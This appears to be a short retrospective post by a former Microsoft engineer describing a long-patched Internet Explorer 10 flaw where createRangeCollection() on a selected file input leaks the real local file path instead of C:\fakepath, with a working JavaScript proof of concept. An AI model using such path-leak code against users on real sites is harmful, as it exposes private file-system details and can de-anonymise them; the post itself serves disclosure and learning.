HTML5 specifies that <input type="file"> should return C:\fakepath\filename instead of the real path, protecting user privacy. I found that calling createRangeCollection() on the selection after selecting the input element returns the real local path, bypassing this protection.

function revealMe() {
    document.getElementById("inputFile").select();
    var rngColl = document.selection.createRangeCollection();
    alert("[ HTML5 Path  --> inputFile.value ]\n    " + document.all.inputFile.value + "\n\n" +
          "[ REAL Path  --> createRangeCollection()[0].text ]\n    " + rngColl[0].text);
}
<input type="file" id="inputFile" size="50" onchange="revealMe()">

The inputFile.value shows the fake path; rngColl[0].text shows the actual C:\users\... path. This was an information disclosure that could de-anonymize file upload interactions. Tested on IE10 (the file upload feature had other issues in IE11 build 20130312-2100 at the time).

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.